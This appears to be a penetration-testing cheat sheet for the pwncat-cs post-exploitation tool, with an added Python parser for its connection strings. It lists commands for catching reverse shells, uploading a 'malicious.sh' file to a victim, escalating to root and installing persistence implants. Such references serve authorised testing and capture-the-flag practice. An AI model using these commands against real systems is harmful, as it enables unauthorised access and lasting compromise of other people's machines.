Pwncat
Basic Usage
# general syntax
[protocol://][user[:password]]@[host:][port][?arg1=value&arg2=value]
Catching a reverse shell.
# catching reverse shell (set up listener)
pwncat-cs bind://0.0.0.0:<port>
# nc syntax
pwncat-cs -lp <port>
# encrypting traffic
pwncat-cs ssl-bind://0.0.0.0:<port>
Connecting to a bind shell.
# connecting to a bind shell
pwncat-cs connect://<ip:port>
# nc syntax
pwncat-cs <ip>:<port>
# encrypting traffic
pwncat-cs ssl-connect://<ip>:<port>
Connecting to a remote SSH server.
# via ssh
pwncat-cs "ssh://<user>:<pass>@<ip>"
# ssh syntax
pwncat-cs <user>@<ip>
# key auth
pwncat-cs -i ./id_rsa <user>@<ip>
Connect to a Windows target.
# Full connection string
pwncat-cs -m windows connect://192.168.1.1:4444
# nc syntax
pwncat-cs -m windows 192.168.1.1 4444
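The connection-string grammar at the top of this sheet, and the nc-style shorthands shown beside each command, are easier to reason about once you see them parsed. The following is an added illustration written for this page, not pwncat's own argument parser. It assumes the `@` is present only when a user is given (as the examples above show), that a bare number is a port rather than a host, and that `-lp <port>` is equivalent to `bind://0.0.0.0:<port>` as the sheet pairs them; no default protocol is assumed for bare host:port strings.

```python
"""Parse pwncat-cs style connection strings (added example, not pwncat's code).

Grammar from the cheat sheet:
    [protocol://][user[:password]]@[host:][port][?arg1=value&arg2=value]
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qsl


@dataclass
class ConnectionString:
    protocol: Optional[str] = None   # bind, connect, ssl-bind, ssl-connect, ssh ...
    user: Optional[str] = None
    password: Optional[str] = None
    host: Optional[str] = None
    port: Optional[int] = None
    args: Dict[str, str] = field(default_factory=dict)


# Assumption: '@' only appears when a user is given; a password containing '@'
# is not supported by this simple regex.
_CONN_RE = re.compile(
    r"^(?:(?P<protocol>[A-Za-z][A-Za-z0-9+.-]*)://)?"      # e.g. bind://, ssl-connect://
    r"(?:(?P<user>[^:@/?]+)(?::(?P<password>[^@/?]*))?@)?"  # user[:password]@
    r"(?P<host>[^:/?]*)"                                    # host (may be empty)
    r"(?::?(?P<port>\d+))?"                                 # [:]port
    r"(?:\?(?P<query>.*))?$"                                # ?arg1=value&arg2=value
)


def parse_connection_string(text: str) -> ConnectionString:
    """Parse one connection string; raise ValueError if it does not fit the grammar."""
    m = _CONN_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a valid connection string: {text!r}")
    cs = ConnectionString(
        protocol=m.group("protocol"),
        user=m.group("user"),
        password=m.group("password"),
        host=m.group("host") or None,
        port=int(m.group("port")) if m.group("port") else None,
        args=dict(parse_qsl(m.group("query") or "")),
    )
    # A bare number such as "4444" is a port, not a host (assumption stated above).
    if cs.host is not None and cs.host.isdigit() and cs.port is None:
        cs.port, cs.host = int(cs.host), None
    if cs.host is None and cs.port is None and cs.user is None:
        raise ValueError(f"connection string names no host, port or user: {text!r}")
    return cs


def parse_positional(argv: List[str]) -> ConnectionString:
    """Accept the nc-style shorthands from the sheet as well as the full string.

    ["-lp", "4444"]         -> bind://0.0.0.0:4444   (assumed equivalence)
    ["10.0.0.5", "4444"]    -> 10.0.0.5:4444         (protocol left unset)
    ["connect://h:4444"]    -> parsed as a full connection string
    """
    if len(argv) == 2 and argv[0] == "-lp" and argv[1].isdigit():
        return ConnectionString(protocol="bind", host="0.0.0.0", port=int(argv[1]))
    if len(argv) == 2 and argv[1].isdigit():
        return parse_connection_string(f"{argv[0]}:{argv[1]}")
    if len(argv) == 1:
        return parse_connection_string(argv[0])
    raise ValueError(f"unrecognised argument form: {argv!r}")


if __name__ == "__main__":
    # Constructed sample inputs mirroring the forms shown on the sheet.
    for sample in (["bind://0.0.0.0:4444"], ["ssh://alice:s3cret@10.0.0.5"],
                   ["alice@10.0.0.5"], ["-lp", "4444"], ["192.168.1.1", "4444"]):
        print(sample, "->", parse_positional(sample))
```

The regex is deliberately strict about where `:` and `@` may appear; if you extend it to allow passwords with `@`, quote or percent-encode them rather than loosening the user/password classes, or a host will silently be swallowed into the password.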
Switch between local and remote modes.
# CTRL+D
(local) pwncat$
# CTRL+D
(remote) www-data@p-web-02.acme-infinity-servers.com:/var/www/html$
# CTRL+D
(local) pwncat$
File transfers.
# download a file
download /etc/hosts ./victim-hosts
# upload a file
upload ./malicious.sh /tmp/definitely-not-malicious
Enumeration
From local
mode.
# search enumeration modules
(local) pwncat$ search enumerate*
# use all enumeration modules
(local) pwncat$ run enumerate
# generate a markdown report
(local) pwncat$ run report output=report.md
EoP
# list escalation paths for any user
(local) pwncat$ escalate list
# list escalation paths to the specified user
(local) pwncat$ escalate list -u <user>
# escalate to root
(local) pwncat$ escalate run
# escalate to the specified user
(local) pwncat$ escalate run -u <user>
Persistence
# list implant methods
(local) pwncat$ search implant*
# list installed implants
(local) pwncat$ run implant list
# escalate using an installed implant
(local) pwncat$ run implant escalate
# remove implant
(local) pwncat$ run implant remove
# list all installed remote implants
pwncat-cs --list
# reconnect using the implant ID
pwncat-cs <implant-id>
Resources